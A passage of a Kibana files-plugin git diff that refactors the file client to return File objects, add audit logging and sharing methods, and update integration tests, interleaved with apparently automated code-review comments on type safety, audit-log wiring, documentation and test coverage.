'UPLOAD_ERROR', }; case 'updateFile': return { ...state, name: payload.name ?? state.name, - Alt: payload.alt ?? state.Alt, - Meta: payload.meta ?? state.Meta, - Updated: moment().toISOString(), + alt: payload.alt ?? state.alt, + meta: payload.meta ?? state.meta, }; default: return state; diff --git a/x-pack/plugins/files/server/file/index.ts b/x-pack/plugins/files/server/file/index.ts index 02740d7eaab6d..2b584945cb71f 100644 --- a/x-pack/plugins/files/server/file/index.ts +++ b/x-pack/plugins/files/server/file/index.ts 
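Review bot: `default: return state;` in `fileAttributesReducer` silently accepts an action the `Action` union does not cover, which hides a forgotten case when a new action is added; since `action` is narrowed to `never` in that branch, an exhaustiveness check costs one line: `default: { const _exhaustive: never = action; return state; }`. The `updateFile` case also cannot clear `alt` or `meta` because `payload.alt ?? state.alt` treats an explicit `null` as "keep the old value"; if clearing is not meant to be supported, a comment saying so would stop the next reader from assuming it is.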
@@ -9,6 +9,6 @@ import * as fileErrors from './errors'; export { File } from './file'; export { toJSON } from './to_json'; -export { createDefaultFileAttributes, fileAttributesReducer } from './file_attributes_reducer'; +export { fileAttributesReducer } from './file_attributes_reducer'; export type { Action } from './file_attributes_reducer'; export { fileErrors }; diff --git a/x-pack/plugins/files/server/file/to_json.ts b/x-pack/plugins/files/server/file/to_json.ts index 390aa1672e06e..98096940fe75f 100644 --- a/x-pack/plugins/files/server/file/to_json.ts +++ b/x-pack/plugins/files/server/file/to_json.ts @@ -5,8 +5,28 @@ * 2.0. */ +import { pickBy } from 'lodash'; import type { FileMetadata, FileJSON } from '../../common/types'; +export function serializeJSON(attrs: Partial): Partial { + const { name, mimeType, size, created, updated, fileKind, status, alt, extension, meta } = attrs; + return pickBy( + { + name, + mime_type: mimeType, + size, + created, + extension, + Alt: alt, + Status: status, + Meta: meta as M, + Updated: updated, + FileKind: fileKind, + }, + (v) => v != null + ); +} + export function toJSON(id: string, attrs: FileMetadata): FileJSON { const { name, @@ -20,17 +40,20 @@ export function toJSON(id: string, attrs: FileMetadata): FileJSON>( + { + id, + name, + mimeType, + size, + created, + extension, + alt: Alt, + status: Status, + meta: Meta as M, + updated: Updated, + fileKind: FileKind, + }, + (v) => v != null + ) as FileJSON; } diff --git a/x-pack/plugins/files/server/file_client/create_es_file_client.ts b/x-pack/plugins/files/server/file_client/create_es_file_client.ts index 2ffb9bd458c6d..9f453a6a25bfc 100644 --- a/x-pack/plugins/files/server/file_client/create_es_file_client.ts +++ b/x-pack/plugins/files/server/file_client/create_es_file_client.ts 
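Review bot: `toJSON` ends with `as FileJSON` after `pickBy(..., (v) => v != null)`, so a stored document lacking a required field (`name`, `status`, `created`) produces an object that violates `FileJSON` without any error, and the cast keeps the compiler quiet about it. Replace the cast with a check of the required keys that throws a descriptive error, or narrow the return to `Partial<FileJSON>` at this boundary and validate in the caller. `serializeJSON` passes caller-supplied `meta` through unchanged (`Meta: meta as M`); that is fine if the metadata client is the only consumer, but a one-line comment stating that `meta` is stored verbatim and not validated here would make the trust boundary explicit.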
@@ -7,7 +7,8 @@ import type { Logger, ElasticsearchClient } from '@kbn/core/server'; import { ElasticsearchBlobStorageClient } from '../blob_storage_service'; -import { FileClientImpl, FileClient } from './file_client'; +import { FileClientImpl } from './file_client'; +import type { FileClient } from './types'; import { EsIndexFilesMetadataClient } from './file_metadata_client'; const NO_FILE_KIND = 'none'; @@ -55,6 +56,9 @@ export function createEsFileClient(arg: CreateEsFileClientArgs): FileClient { maxSizeBytes, }, new EsIndexFilesMetadataClient(metadataIndex, elasticsearchClient, logger), - new ElasticsearchBlobStorageClient(elasticsearchClient, blobStorageIndex, undefined, logger) + new ElasticsearchBlobStorageClient(elasticsearchClient, blobStorageIndex, undefined, logger), + undefined, + undefined, + logger ); } diff --git a/x-pack/plugins/files/server/file_client/file_client.ts b/x-pack/plugins/files/server/file_client/file_client.ts index cc9a4a6de2994..595d0095a6625 100644 --- a/x-pack/plugins/files/server/file_client/file_client.ts +++ b/x-pack/plugins/files/server/file_client/file_client.ts 
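Review bot: `createEsFileClient` now constructs `FileClientImpl` with positional `undefined, undefined, logger`, so no `AuditLogger` is wired for this client; per the constructor in file_client.ts, create/delete audit events then fall back to `this.logger.info(JSON.stringify(e.event, null, 2))`, i.e. they land in the application log at info level rather than in the security audit log and disappear if the log level is raised. If that is intended for this client, say so at the call site (`// no audit logger: audit events are written to the plain logger at info level`); otherwise accept an optional `auditLogger` in `CreateEsFileClientArgs` and pass it through. Either way the `createFileClient({ ... })` factory added in this commit would replace the two anonymous `undefined` arguments with named ones (`internalFileShareService: undefined, auditLogger: undefined, logger`).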
@@ -4,165 +4,170 @@ * 2.0; you may not use this file except in compliance with the Elastic License * 2.0. */ +import moment from 'moment'; import { Readable } from 'stream'; +import mimeType from 'mime'; import cuid from 'cuid'; -import { FileKind, FileMetadata } from '../../common/types'; +import type { Logger } from '@kbn/core/server'; +import type { AuditLogger } from '@kbn/security-plugin/server'; +import type { + File, + FileJSON, + FileKind, + FileMetadata, + FileShareJSONWithToken, + UpdatableFileMetadata, +} from '../../common/types'; import type { FileMetadataClient } from './file_metadata_client'; import type { BlobStorageClient, UploadOptions as BlobUploadOptions, } from '../blob_storage_service'; +import { File as FileImpl } from '../file'; +import { FileShareServiceStart, InternalFileShareService } from '../file_share_service'; import { enforceMaxByteSizeTransform } from './stream_transforms'; - -export interface DeleteArgs { - /** ID of the file to delete */ - id: string; - /** - * If `true`, the file will be deleted from the blob storage. - * - * @default true - */ - hasContent?: boolean; -} - -/** - * Args to create a file - */ -export interface CreateArgs { - /** - * Unique file ID - */ - id?: string; - /** - * The file's metadata - */ - metadata: Omit & { FileKind?: string }; -} +import { createAuditEvent } from '../audit_events'; +import type { FileClient, CreateArgs, DeleteArgs, P1, ShareArgs } from './types'; +import { serializeJSON, toJSON } from '../file/to_json'; +import { createDefaultFileAttributes } from './utils'; export type UploadOptions = Omit; -/** - * Wraps the {@link FileMetadataClient} and {@link BlobStorageClient} client - * to provide basic file CRUD functionality. - * - * For now this is just a shallow type of the implementation for export purposes. - */ -export interface FileClient { - /** See {@link FileMetadata.FileKind}. */ - fileKind: string; - - /** - * See {@link FileMetadataClient.create}. 
- * - * @param arg - Arg to create a file. - * */ - create(arg: CreateArgs): ReturnType; - - /** - * See {@link FileMetadataClient.get} - * - * @param arg - Argument to get a file - */ - get: FileMetadataClient['get']; - - /** - * {@link FileMetadataClient.update} - * - * @param arg - Argument to get a file - */ - update: FileMetadataClient['update']; - - /** - * Delete a file. - * @param arg - Argument to delete a file - */ - delete(arg: DeleteArgs): Promise; - - /** - * See {@link BlobStorageClient.delete} - * - * @param id - Argument to delete a file - */ - deleteContent: BlobStorageClient['delete']; - - /** - * See {@link FileMetadataClient.list} - * - * @param arg - Argument to list files - */ - list: FileMetadataClient['list']; - - /** - * See {@link FileMetadataClient.find}. - * - * @param arg - Argument to find files - */ - find: FileMetadataClient['find']; - - /** - * See {@link BlobStorageClient.upload} - * - * @param id - Readable stream to upload - * @param rs - Readable stream to upload - * @param opts - Argument for uploads - */ - upload(id: string, rs: Readable, opts?: UploadOptions): ReturnType; - - /** - * See {@link BlobStorageClient.download} - * - * @param args - to download a file - */ - download: BlobStorageClient['download']; +export function createFileClient({ + fileKindDescriptor, + auditLogger, + blobStorageClient, + internalFileShareService, + logger, + metadataClient, +}: { + fileKindDescriptor: FileKind; + metadataClient: FileMetadataClient; + blobStorageClient: BlobStorageClient; + internalFileShareService: undefined | InternalFileShareService; + auditLogger: undefined | AuditLogger; + logger: Logger; +}) { + return new FileClientImpl( + fileKindDescriptor, + metadataClient, + blobStorageClient, + internalFileShareService, + auditLogger, + logger + ); } + export class FileClientImpl implements FileClient { + private readonly logAuditEvent: AuditLogger['log']; + constructor( private fileKindDescriptor: FileKind, private readonly 
metadataClient: FileMetadataClient, - private readonly blobStorageClient: BlobStorageClient - ) {} + private readonly blobStorageClient: BlobStorageClient, + private readonly internalFileShareService: undefined | InternalFileShareService, + auditLogger: undefined | AuditLogger, + private readonly logger: Logger + ) { + this.logAuditEvent = (e) => { + if (auditLogger) { + auditLogger.log(e); + } else if (e) { + this.logger.info(JSON.stringify(e.event, null, 2)); + } + }; + } + + private instantiateFile(id: string, metadata: FileMetadata): File { + return new FileImpl( + id, + toJSON(id, { + ...createDefaultFileAttributes(), + ...metadata, + }), + this, + this.logger + ); + } public get fileKind(): string { return this.fileKindDescriptor.id; } - public create = async ({ - id, - metadata, - }: CreateArgs): ReturnType => { - return this.metadataClient.create({ + public async create({ id, metadata }: CreateArgs): Promise> { + const serializedMetadata = serializeJSON({ ...metadata, mimeType: metadata.mime }); + const result = await this.metadataClient.create({ id: id || cuid(), metadata: { + ...createDefaultFileAttributes(), + ...serializedMetadata, + name: serializedMetadata.name!, + extension: + (serializedMetadata.mime_type && mimeType.getExtension(serializedMetadata.mime_type)) ?? 
+ undefined, FileKind: this.fileKind, - ...metadata, }, }); - }; + this.logAuditEvent( + createAuditEvent({ + action: 'create', + message: `Created file "${result.metadata.name}" of kind "${this.fileKind}" and id "${result.id}"`, + }) + ); + return this.instantiateFile(result.id, { + ...result.metadata, + FileKind: this.fileKind, + }) as File; + } - public get: FileMetadataClient['get'] = async (arg) => { - return this.metadataClient.get(arg); - }; + public async get(arg: P1): Promise> { + const { id, metadata } = await this.metadataClient.get(arg); + return this.instantiateFile(id, metadata as FileMetadata); + } - public update: FileMetadataClient['update'] = (arg) => { - return this.metadataClient.update(arg); - }; + public async internalUpdate(id: string, metadata: Partial): Promise { + await this.metadataClient.update({ id, metadata: serializeJSON(metadata) }); + } - public find: FileMetadataClient['find'] = (arg) => { - return this.metadataClient.find(arg); - }; + public async update(id: string, metadata: UpdatableFileMetadata): Promise { + const { alt, meta, name } = metadata; + const payload = { name, alt, meta, updated: moment().toISOString() }; + await this.internalUpdate(id, payload); + } + + public async find(arg: P1): Promise>> { + return this.metadataClient + .find(arg) + .then((r) => + r.map(({ id, metadata }) => this.instantiateFile(id, metadata as FileMetadata)) + ); + } public async delete({ id, hasContent = true }: DeleteArgs) { + if (this.internalFileShareService) { + // Stop sharing this file + await this.internalFileShareService.deleteForFile({ id }); + } if (hasContent) await this.blobStorageClient.delete(id); - return this.metadataClient.delete({ id }); + await this.metadataClient.delete({ id }); + this.logAuditEvent( + createAuditEvent({ + action: 'delete', + outcome: 'success', + message: `Deleted file with "${id}"`, + }) + ); } public deleteContent: BlobStorageClient['delete'] = (arg) => { return this.blobStorageClient.delete(arg); }; - 
public list: FileMetadataClient['list'] = (arg) => { - return this.metadataClient.list(arg); - }; + public async list(arg?: P1): Promise { + return this.metadataClient + .list(arg) + .then((r) => r.map(({ id, metadata }) => this.instantiateFile(id, metadata))); + } /** * Upload a blob @@ -188,4 +193,45 @@ export class FileClientImpl implements FileClient { public download: BlobStorageClient['download'] = (args) => { return this.blobStorageClient.download(args); }; + + async share({ file, name, validUntil }: ShareArgs): Promise { + if (!this.internalFileShareService) { + throw new Error('#share not implemented'); + } + const shareObject = await this.internalFileShareService.share({ + file, + name, + validUntil, + }); + this.logAuditEvent( + createAuditEvent({ + action: 'create', + message: `Shared file "${file.data.name}" with id "${file.data.id}"`, + }) + ); + return shareObject; + } + + unshare: FileShareServiceStart['delete'] = async (arg) => { + if (!this.internalFileShareService) { + throw new Error('#delete shares is not implemented'); + } + const result = await this.internalFileShareService.delete(arg); + + this.logAuditEvent( + createAuditEvent({ + action: 'delete', + message: `Removed share with id "${arg.id}"`, + }) + ); + + return result; + }; + + listShares: FileShareServiceStart['list'] = (args) => { + if (!this.internalFileShareService) { + throw new Error('#list shares not implemented'); + } + return this.internalFileShareService.list(args); + }; } diff --git a/x-pack/plugins/files/server/file_client/index.ts b/x-pack/plugins/files/server/file_client/index.ts index 2f764a53224e4..cb9c2187bc996 100644 --- a/x-pack/plugins/files/server/file_client/index.ts +++ b/x-pack/plugins/files/server/file_client/index.ts 
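Review bot: The delete audit message `Deleted file with "${id}"` reads as if a word is missing and drops the name and kind the old message carried, which makes the audit trail harder to correlate; use `message: \`Deleted file of kind "${this.fileKind}" with id "${id}"\``. The `logAuditEvent` fallback serialises only `e.event`, so if `createAuditEvent` also returns the `message` it is given (every call site here passes one), that text is lost on the non-audit path — log the whole object or at least `e.message` alongside `e.event`. `unshare` deletes whatever share id it is handed without checking that the share belongs to a file of this client's kind; that mirrors the previous behaviour, but now that it is a public client method it deserves a comment stating the caller is responsible for that authorisation, or a check. Style: `find` and `list` are `async` yet chain `.then`; `const r = await this.metadataClient.find(arg); return r.map(...)` is the consistent form.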
@@ -17,6 +17,12 @@ export type { UpdateMetadataArg, } from './file_metadata_client'; export { FileClientImpl } from './file_client'; -export type { FileClient } from './file_client'; +export type { FileClient } from './types'; export { createEsFileClient } from './create_es_file_client'; export type { CreateEsFileClientArgs } from './create_es_file_client'; +export { + AlreadyDeletedError, + ContentAlreadyUploadedError, + NoDownloadAvailableError, + UploadInProgressError, +} from '../file/errors'; diff --git a/x-pack/plugins/files/server/file_client/integration_tests/es_file_client.test.ts b/x-pack/plugins/files/server/file_client/integration_tests/es_file_client.test.ts index 3ab200533c6da..19abeafa786dc 100644 --- a/x-pack/plugins/files/server/file_client/integration_tests/es_file_client.test.ts +++ b/x-pack/plugins/files/server/file_client/integration_tests/es_file_client.test.ts @@ -8,7 +8,8 @@ import { Readable } from 'stream'; import { loggingSystemMock } from '@kbn/core/server/mocks'; import { TestEnvironmentUtils, setupIntegrationEnvironment } from '../../test_utils'; import { createEsFileClient } from '../create_es_file_client'; -import { FileClient } from '../file_client'; +import { FileClient } from '../types'; +import { FileMetadata } from '../../../common'; /** * This file client is using Elasticsearch interfaces directly to manage files. @@ -17,6 +18,8 @@ describe('ES-index-backed file client', () => { let esClient: TestEnvironmentUtils['esClient']; let fileClient: FileClient; let testHarness: TestEnvironmentUtils; + const blobStorageIndex = '.kibana-test-blob'; + const metadataIndex = '.kibana-test-metadata'; beforeAll(async () => { testHarness = await setupIntegrationEnvironment(); 
@@ -25,8 +28,8 @@ describe('ES-index-backed file client', () => { beforeEach(() => { fileClient = createEsFileClient({ - blobStorageIndex: '.kibana-test-blob', - metadataIndex: '.kibana-test-metadata', + blobStorageIndex, + metadataIndex, elasticsearchClient: esClient, logger: loggingSystemMock.create().get(), }); 
@@ -40,64 +43,46 @@ describe('ES-index-backed file client', () => { const file = await fileClient.create({ id: '123', metadata: { - Status: 'AWAITING_UPLOAD', - created: new Date().toISOString(), - Updated: new Date().toISOString(), name: 'cool name', }, }); - expect(file).toEqual( + expect(file.toJSON()).toEqual( expect.objectContaining({ id: '123', - metadata: { - FileKind: 'none', - Status: 'AWAITING_UPLOAD', - Updated: expect.any(String), - created: expect.any(String), - name: 'cool name', - }, + fileKind: 'none', + status: 'AWAITING_UPLOAD', + updated: expect.any(String), + created: expect.any(String), + name: 'cool name', }) ); await fileClient.delete({ id: file.id, hasContent: false }); }); test('uploads and downloads file content', async () => { - let { id, metadata } = await fileClient.create({ + const file = await fileClient.create({ id: '123', metadata: { - Status: 'AWAITING_UPLOAD', - created: new Date().toISOString(), - Updated: new Date().toISOString(), name: 'cool name', }, }); - - const { size } = await fileClient.upload(id, Readable.from([Buffer.from('test')])); - ({ id, metadata } = await fileClient.update({ - id, - metadata: { ...metadata, size, Status: 'READY' }, - })); - - const file = await fileClient.get({ id }); - const rs = await fileClient.download({ id: file.id, size: file.metadata.size }); + await file.uploadContent(Readable.from([Buffer.from('test')])); + const rs = await file.downloadContent(); const chunks: Buffer[] = []; for await (const chunk of rs) { chunks.push(chunk); } expect(Buffer.concat(chunks).toString('utf-8')).toBe('test'); - await fileClient.delete({ id, hasContent: true }); + await fileClient.delete({ id: file.id, hasContent: true }); }); test('searches across files', async () => { const { id: id1 } = await fileClient.create({ id: '123', metadata: { - Status: 'AWAITING_UPLOAD', - created: new Date().toISOString(), - Updated: new Date().toISOString(), name: 'cool name 1', - Meta: { + meta: { test: '1', }, }, 
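Review bot: The rewritten `uploads and downloads file content` test no longer looks at the metadata after the upload, so a regression in the `uploaded` transition (status or size not persisted) would pass here as long as the bytes round-trip; after `await file.uploadContent(...)` add `expect(file.data.status).toBe('READY'); expect(file.data.size).toBe(4);`. The first test could likewise assert `file.data.fileKind` equals `'none'` through the instance rather than only through `toJSON()`, since both paths are now public.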
@@ -105,28 +90,24 @@ describe('ES-index-backed file client', () => { const { id: id2 } = await fileClient.create({ id: '1234', metadata: { - Status: 'UPLOADING', - created: new Date().toISOString(), - Updated: new Date().toISOString(), name: 'cool name 2', - Meta: { + meta: { test: '2', }, }, }); - const { id: id3 } = await fileClient.create({ + const file3 = await fileClient.create({ id: '12345', metadata: { - Status: 'READY', - created: new Date().toISOString(), - Updated: new Date().toISOString(), name: 'cool name 3', - Meta: { + meta: { test: '3', }, }, }); + await file3.uploadContent(Readable.from(['test'])); + { const results = await fileClient.find({ status: ['READY'], @@ -137,7 +118,7 @@ describe('ES-index-backed file client', () => { expect(results[0]).toEqual( expect.objectContaining({ - id: id3, + id: file3.id, }) ); } @@ -147,7 +128,7 @@ describe('ES-index-backed file client', () => { status: ['READY', 'AWAITING_UPLOAD'], }); - expect(results).toHaveLength(2); + expect(results).toHaveLength(3); expect(results[0]).toEqual( expect.objectContaining({ @@ -157,7 +138,13 @@ describe('ES-index-backed file client', () => { expect(results[1]).toEqual( expect.objectContaining({ - id: id3, + id: id2, + }) + ); + + expect(results[2]).toEqual( + expect.objectContaining({ + id: file3.id, }) ); } @@ -165,7 +152,7 @@ describe('ES-index-backed file client', () => { await Promise.all([ fileClient.delete({ id: id1 }), fileClient.delete({ id: id2 }), - fileClient.delete({ id: id3 }), + fileClient.delete({ id: file3.id }), ]); }); 
@@ -173,24 +160,23 @@ describe('ES-index-backed file client', () => { const { id: id1 } = await fileClient.create({ id: '123', metadata: { - Status: 'AWAITING_UPLOAD', - created: new Date().toISOString(), - Updated: new Date().toISOString(), name: 'cool name 1', - Meta: { + meta: { test: '1', }, }, }); - const { id: id2 } = await fileClient.create({ - id: '1234', - metadata: { - Status: 'DELETED', - created: new Date().toISOString(), - Updated: new Date().toISOString(), - name: 'cool name 2', - Meta: { - test: '2', + const id2 = '1234'; + await esClient.index<{ file: FileMetadata }>({ + id: id2, + index: metadataIndex, + document: { + file: { + FileKind: 'none', + Status: 'DELETED', + Updated: new Date().toISOString(), + created: new Date().toISOString(), + name: 'coolname', }, }, }); @@ -198,17 +184,15 @@ describe('ES-index-backed file client', () => { const list = await fileClient.list(); expect(list).toHaveLength(1); - expect(list[0]).toEqual( + expect(list[0].toJSON()).toEqual( expect.objectContaining({ id: '123', - metadata: { - FileKind: 'none', - Meta: { test: '1' }, - Status: 'AWAITING_UPLOAD', - Updated: expect.any(String), - created: expect.any(String), - name: 'cool name 1', - }, + fileKind: 'none', + meta: { test: '1' }, + status: 'AWAITING_UPLOAD', + updated: expect.any(String), + created: expect.any(String), + name: 'cool name 1', }) ); diff --git a/x-pack/plugins/files/server/file_client/types.ts b/x-pack/plugins/files/server/file_client/types.ts new file mode 100644 index 0000000000000..bbab0066cf3f0 --- /dev/null +++ b/x-pack/plugins/files/server/file_client/types.ts 
@@ -0,0 +1,134 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +import type { File, FileShareJSONWithToken, UpdatableFileMetadata } from '../../common/types'; +import { CreateFileArgs } from '../file_service'; +import { FileShareServiceStart } from '../file_share_service'; +import { FileMetadataClient } from './file_metadata_client'; + +export type P1 any> = Parameters[0]; + +export interface DeleteArgs { + /** ID of the file to delete */ + id: string; + /** + * If `true`, the file will be deleted from the blob storage. + * + * @default true + */ + hasContent?: boolean; +} + +/** + * Args to create a file + */ +export interface CreateArgs { + /** + * Unique file ID + */ + id?: string; + /** + * The file's metadata + */ + metadata: Omit; +} + +/** + * File share args + */ +export interface ShareArgs { + /** + * Name of the file share + */ + name?: string; + /** + * Unix timestamp (in milliseconds) when the file share will expire + */ + validUntil?: number; + /** + * The file to share + */ + file: File; +} + +/** + * Wraps the {@link FileMetadataClient} and {@link BlobStorageClient} client + * to provide basic file CRUD functionality. + * + * For now this is just a shallow type of the implementation for export purposes. + */ +export interface FileClient { + /** See {@link FileMetadata.FileKind}. */ + fileKind: string; + + /** + * See {@link FileMetadataClient.create}. + * + * @param arg - Arg to create a file. 
+ * */ + create(arg: CreateArgs): Promise>; + + /** + * See {@link FileMetadataClient.get} + * + * @param arg - Argument to get a file + */ + get(arg: P1): Promise>; + + /** + * {@link FileMetadataClient.update} + * + * @param id - File id + * @param metadata - new file metadata + */ + update(id: string, metadata: UpdatableFileMetadata): Promise; + + /** + * Delete a file. + * @param arg - Argument to delete a file + */ + delete(arg: DeleteArgs): Promise; + + /** + * See {@link FileMetadataClient.list} + * + * @param arg - Argument to list files + */ + list(arg?: P1): Promise; + + /** + * See {@link FileMetadataClient.find}. + * + * @param arg - Argument to find files + */ + find: (arg: P1) => Promise; + + /** + * Create a file share instance for this file. + * + * @note this will only work for files that are share capable. + * + * @param args - Arguments to create a file share + */ + share(args: ShareArgs): Promise; + /** + * Create a file share instance for this file. + * + * @note this will only work for files that are share capable. + * + * @param args - Arguments to remove a file share + */ + unshare: FileShareServiceStart['delete']; + /** + * Create a file share instance for this file. + * + * @note this will only work for files that are share capable. + * + * @param arg - Arguments to remove a file share + */ + listShares: FileShareServiceStart['list']; +} diff --git a/x-pack/plugins/files/server/file_client/utils.ts b/x-pack/plugins/files/server/file_client/utils.ts new file mode 100644 index 0000000000000..b8b51117e8ac1 --- /dev/null +++ b/x-pack/plugins/files/server/file_client/utils.ts 
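Review bot: The TSDoc for `unshare` and `listShares` in `FileClient` is copied from `share` ("Create a file share instance for this file."), so the interface documents the wrong contract for two of its three share methods; change them to `Remove a file share by its id.` and `List the shares that exist for a file.` respectively, keeping the `@note` line about share-capable files. `ShareArgs.name` is optional here while `File.share` in file.ts now requires `name: string`; pick one so callers get the same contract from both entry points.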
@@ -0,0 +1,20 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +import type { FileMetadata } from '../../common'; + +export function createDefaultFileAttributes(): Pick< + FileMetadata, + 'created' | 'Updated' | 'Status' +> { + const dateString = new Date().toISOString(); + return { + created: dateString, + Status: 'AWAITING_UPLOAD', + Updated: dateString, + }; +} diff --git a/x-pack/plugins/files/server/file_service/file_service.ts b/x-pack/plugins/files/server/file_service/file_service.ts index 90303ac715437..f8d8534b7a635 100644 --- a/x-pack/plugins/files/server/file_service/file_service.ts +++ b/x-pack/plugins/files/server/file_service/file_service.ts @@ -5,7 +5,7 @@ * 2.0. */ -import type { File, FileJSON, FilesMetrics } from '../../common'; +import type { FileJSON, FilesMetrics, File } from '../../common'; import type { FileShareServiceStart } from '../file_share_service/types'; import type { CreateFileArgs, @@ -34,7 +34,7 @@ export interface FileServiceStart { * * @param args - update file args */ - update(args: UpdateFileArgs): Promise>; + update(args: UpdateFileArgs): Promise; /** * Delete a file. diff --git a/x-pack/plugins/files/server/file_service/file_service_factory.ts b/x-pack/plugins/files/server/file_service/file_service_factory.ts index bed007b00e507..b6603a43f8720 100644 --- a/x-pack/plugins/files/server/file_service/file_service_factory.ts +++ b/x-pack/plugins/files/server/file_service/file_service_factory.ts 
@@ -95,7 +95,7 @@ export class FileServiceFactoryImpl implements FileServiceFactory { return internalFileService.createFile(args) as Promise>; }, async update(args: UpdateFileArgs) { - return internalFileService.updateFile(args) as Promise>; + await internalFileService.updateFile(args); }, async delete(args) { return internalFileService.deleteFile(args); diff --git a/x-pack/plugins/files/server/file_service/internal_file_service.ts b/x-pack/plugins/files/server/file_service/internal_file_service.ts index 567df3e137848..a7ba92db9b2e8 100644 --- a/x-pack/plugins/files/server/file_service/internal_file_service.ts +++ b/x-pack/plugins/files/server/file_service/internal_file_service.ts @@ -23,7 +23,7 @@ import type { GetByIdArgs, ListFilesArgs, } from './file_action_types'; -import { FileClientImpl } from '../file_client/file_client'; +import { createFileClient, FileClientImpl } from '../file_client/file_client'; /** * Service containing methods for working with files. * @@ -42,16 +42,7 @@ export class InternalFileService { ) {} public async createFile(args: CreateFileArgs): Promise { - const fileKind = this.getFileKind(args.fileKind); - return await File.create( - { ...args, fileKind }, - this, - new FileClientImpl( - fileKind, - this.metadataClient, - this.blobStorageService.createBlobStorageClient(fileKind.blobStoreSettings) - ) - ); + return this.createFileClient(args.fileKind).create({ metadata: { ...args } }); } public writeAuditLog(event: AuditEvent) { @@ -79,7 +70,7 @@ export class InternalFileService { if (metadata.Status === 'DELETED') { throw new FileNotFoundError('File has been deleted'); } - return this.toFile(id, metadata, this.getFileKind(metadata.FileKind)); + return this.toFile(id, metadata, metadata.FileKind); } catch (e) { if (SavedObjectsErrorHelpers.isNotFoundError(e)) { throw new FileNotFoundError('File not found'); 
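Review bot: `createFile` spreads the whole `args` object into `metadata` (`{ metadata: { ...args } }`), so `fileKind` and any other non-metadata property travel into `FileClientImpl.create` and are only dropped because `serializeJSON` picks known keys; destructure explicitly, `const { fileKind, ...metadata } = args; return this.createFileClient(fileKind).create({ metadata });`. In `get`, `this.toFile(id, metadata, metadata.FileKind)` now resolves the kind from the stored document through the registry lookup in `createFileClient`; if `fileKindRegistry.get` throws for an unregistered id (not visible here), a document whose kind has since been removed surfaces as an unhandled error instead of the `FileNotFoundError` this method otherwise raises — worth a comment or a guard.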
@@ -91,8 +82,8 @@ export class InternalFileService { public async getById({ fileKind, id }: GetByIdArgs): Promise { const file = await this.get(id); - if (file.fileKind !== fileKind) { - throw new Error(`Unexpected file kind "${file.fileKind}", expected "${fileKind}".`); + if (file.data.fileKind !== fileKind) { + throw new Error(`Unexpected file kind "${file.data.fileKind}", expected "${fileKind}".`); } return file; } @@ -108,28 +99,8 @@ export class InternalFileService { page, perPage, }); - return result.map((file) => this.toFile(file.id, file.metadata, fileKind)); - } - - public toFile( - id: string, - fileMetadata: FileMetadata, - fileKind: FileKind, - fileClient?: FileClientImpl - ): IFile { - return new File( - id, - fileMetadata, - fileClient ?? - new FileClientImpl( - fileKind, - this.metadataClient, - this.blobStorageService.createBlobStorageClient(fileKind.blobStoreSettings) - ), - this, - this.fileShareService, - this.logger.get(`file-${id}`) - ); + const fileClient = this.createFileClient(fileKind.id); + return result.map((file) => this.toFile(file.id, file.metadata, fileKind.id, fileClient)); } public getFileKind(id: string): FileKind { 
@@ -153,4 +124,32 @@ export class InternalFileService { const { fileId } = await this.fileShareService.getByToken(token); return this.get(fileId); } + + private toFile( + id: string, + fileMetadata: FileMetadata, + fileKind: string, + fileClient?: FileClientImpl + ): IFile { + return new File( + id, + toJSON(id, fileMetadata), + fileClient ?? this.createFileClient(fileKind), + this.logger.get(`file-${id}`) + ); + } + + private createFileClient(fileKindId: string) { + const fileKind = this.fileKindRegistry.get(fileKindId); + return createFileClient({ + auditLogger: this.auditLogger, + blobStorageClient: this.blobStorageService.createBlobStorageClient( + fileKind.blobStoreSettings + ), + fileKindDescriptor: fileKind, + internalFileShareService: this.fileShareService, + logger: this.logger, + metadataClient: this.metadataClient, + }); + } } diff --git a/x-pack/plugins/files/server/file_share_service/internal_file_share_service.ts b/x-pack/plugins/files/server/file_share_service/internal_file_share_service.ts index 7b6f8498b0e3e..6c9e09e5173b4 100644 --- a/x-pack/plugins/files/server/file_share_service/internal_file_share_service.ts +++ b/x-pack/plugins/files/server/file_share_service/internal_file_share_service.ts @@ -85,9 +85,9 @@ export type GetArgs = IdArg; */ export interface DeleteForFileArgs { /** - * The file object to delete the shares for. + * The file id to delete the shares for. */ - file: File; + id: string; } /** @@ -144,7 +144,7 @@ export class InternalFileShareService implements FileShareServiceStart { token: generateShareToken(), }, { - references: [{ name: file.name, id: file.id, type: FILE_SO_TYPE }], + references: [{ name: file.data.name, id: file.data.id, type: FILE_SO_TYPE }], } ); 
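Review bot: `createFileClient` resolves the kind with `this.fileKindRegistry.get(fileKindId)` and immediately dereferences `fileKind.blobStoreSettings`, while the class keeps a `getFileKind(id: string): FileKind` accessor (its signature is visible in the previous hunk) that the removed code went through; if the registry returns `undefined` for an unknown id, this now fails with a `TypeError` instead of whatever `getFileKind` reports. That matters because `get()` now passes `metadata.FileKind` straight from the stored saved object, so a kind unregistered after files were created would break every read of those files. Suggest `const fileKind = this.getFileKind(fileKindId);` here, or an explicit guard that throws a typed error. I cannot see the registry's contract from this diff, so treat the `undefined` case as something to confirm.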
@@ -183,8 +183,8 @@ export class InternalFileShareService implements FileShareServiceStart { return result.saved_objects; } - public async deleteForFile({ file }: DeleteForFileArgs): Promise { - const savedObjects = await this.internalList({ fileId: file.id }); + public async deleteForFile({ id: fileId }: DeleteForFileArgs): Promise { + const savedObjects = await this.internalList({ fileId }); await Promise.all(savedObjects.map(({ id }) => this.delete({ id }))); } diff --git a/x-pack/plugins/files/server/integration_tests/file_service.test.ts b/x-pack/plugins/files/server/integration_tests/file_service.test.ts index 0547fe0ed30fb..61196597cc5f9 100644 --- a/x-pack/plugins/files/server/integration_tests/file_service.test.ts +++ b/x-pack/plugins/files/server/integration_tests/file_service.test.ts @@ -107,9 +107,9 @@ describe('FileService', () => { it('creates file metadata awaiting upload', async () => { const file = await createDisposableFile({ fileKind, name: 'test' }); - expect(file.name).toEqual('test'); - expect(file.fileKind).toEqual(fileKind); - expect(file.status).toBe('AWAITING_UPLOAD' as FileStatus); + expect(file.data.name).toEqual('test'); + expect(file.data.fileKind).toEqual(fileKind); + expect(file.data.status).toBe('AWAITING_UPLOAD' as FileStatus); expect(auditLogger.log).toHaveBeenCalledTimes(1); 